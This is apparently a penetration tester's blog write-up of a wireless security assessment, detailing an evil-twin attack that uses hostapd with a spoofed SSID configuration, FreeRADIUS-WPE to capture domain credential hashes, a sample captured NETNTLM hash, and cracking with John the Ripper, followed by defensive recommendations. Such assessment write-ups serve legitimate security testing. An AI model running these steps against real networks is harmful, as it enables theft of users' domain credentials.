In one of my recent assessments I had to look at some wireless networks at a few locations. I had not done a Wireless Security Assessment in ages so it was a good exercise to see whats changed, learn about some new authentication protocols and learn a few new attack vectors.
Everything was run from my Kali installation running on my Macbook via VMware Fusion and I used the Alfa AR 9271 Wireless USB card for WiFi (came with my wifipineapple (: ). Yes VMware does not pickup your native built-in wifi cards, hence why I used an external USB WiFi adapter which I attached to my guest system which picks it up just fine.
All the used tools:
- FreeRadius-WPE
- Hostap
- Kali
- asleap
- John the Ripper
The approach taken was to impersonate the access points you are attacking and to run your own RADIUS server which will be used to capture password hashes. The password hashes are then cracked offline using either asleap or as I found out and worked better for me, John the Ripper.
Essentially you run hostap to impersonate the access point and run a patched FreeRADIUS server to handle the authentication, by handle I mean capture hashes of users authenticating to your spoofed access point.
FreeRADIUS-WPE
The first step is to download and compile/run/install FreeRADIUS Wireless Pwnage Edition (WPE) which has been tweaked exactly for the purpose of capturing RADIUS authentication requests.- https://github.com/brad-anton/freeradius-wpe
The logs which contains the captured hashes is located here:
- /usr/local/var/log/radius/freeradius-server-wpe.log
HostAP
Now that FreeRADIUS is installed we make sure hostap is running/installed. If you dont have it installed you can find a copy here:- http://hostap.epitest.fi/releases/hostapd-2.0.tar.gz
interface=wlan0 driver=nl80211 ssid=SpooFed4cc3sspoint country_code=ZA logger_stdout=-1 logger_stdout_level=0 dump_file=/tmp/hostapd.dump ieee8021x=1 eapol_key_index_workaround=0 own_ip_addr=127.0.0.1 auth_server_addr=127.0.0.1 auth_server_port=1812 auth_server_shared_secret=testing123 auth_algs=3 wpa=2 wpa_key_mgmt=WPA-EAP channel=1 wpa_pairwise=CCMP rsn_pairwise=CCMP
Command:
- hostapd -dd wpe-test.conf
- /usr/local/etc/raddb/modules/mschap
with_ntdomain_hack = yes
tail -f /usr/local/var/log/radius/freeradius-server-wpe.log
mschap: Mon Feb 1 12:15:52 2014 username: domain\testuser challenge: ab:bb:dd:c6:a1:13:53:dd response: de:14:c8:a8:7e:ce:53:5304:f8:a0:75:ce:53:53:ca:70:35:e1:e6:21:0c:f1:b6 john NETNTLM: domain\testuser:$NETNTLM$9d0addde98e8474$d09ef8t43db04f8a075ce5353cd993571b621aeeec4
Cracking the captured Credentials
Here you can use either asleap or in my case John. I didnt have a large enough wordlist at the time of the assessment o use with asleap (wordlist based cracking). So I found that john supports the captured WPE hashes (NETNTLM), and this is accommodated by WPE.Simply take the NETNTLM hashes and use john to crack.
*Remember this is only for use of networks you are authorised to test and I hold no responsibility should you use this for malicious means.
Some recommendations:
- Users should be vigilant of the networks they connecting to, in the above attack I found that most mobile devices happily connected to the "spoofed" access point with no issues, however my Macbook and Windows picked up that the certificate did not match and prompted the user with a warning. Although some users continued connection after the prompt (: So user awareness is important, but there is no patch for human stupidity!
- I dont think using domain credentials for authenitcation over the wireless network is the best idea, yes its practical but you are potentially broadcasting those hashes to the world and its not that hard to crack them! And who knows where else you can reuse the credentials to obtain further access. So I would suggest seperate set of credentials for authentication
Other WiFi tools for Mac OSX that I came across:
iStumbler for Mac - http://istumbler.net/
Kismac 2 - https://github.com/IGRSoft/KisMac2